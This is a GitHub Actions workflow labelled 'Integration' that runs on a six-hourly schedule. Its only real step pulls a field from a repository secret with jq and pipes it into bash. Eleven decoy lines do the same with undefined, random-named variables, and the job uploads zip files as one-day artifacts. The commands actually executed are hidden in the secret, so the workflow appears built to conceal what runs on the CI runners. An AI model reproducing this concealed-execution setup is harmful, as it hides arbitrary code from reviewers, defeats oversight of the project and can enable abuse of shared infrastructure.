name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          nmd225: ${{ secrets.nmd225 }}
        run: |
          printf '%s' "$nmd225" | jq -r .z3 | /bin/bash
          printf '%s' "$i9" | jq -r .xquay747 | /bin/bash
          printf '%s' "$lnsvu535" | jq -r .eus64869 | /bin/bash
          printf '%s' "$x854" | jq -r .kn29 | /bin/bash
          printf '%s' "$da86343" | jq -r .fmequ2605 | /bin/bash
          echo $f861 | jq -r .ued848 | /bin/bash
          echo $wqme0 | jq -r .omjs9579 | /bin/bash
          echo $sj667 | jq -r .reevf57 | /bin/bash
          echo $hvuq4 | jq -r .qf08 | /bin/bash
          echo $qdci04 | jq -r .yxiw589 | /bin/bash
          printf '%s' "$ix3" | jq -r .vds9229 | /bin/bash
          printf '%s' "$xi0" | jq -r .vd40314 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: r4w16VWy
          path: "*.zip"
          retention-days: 1
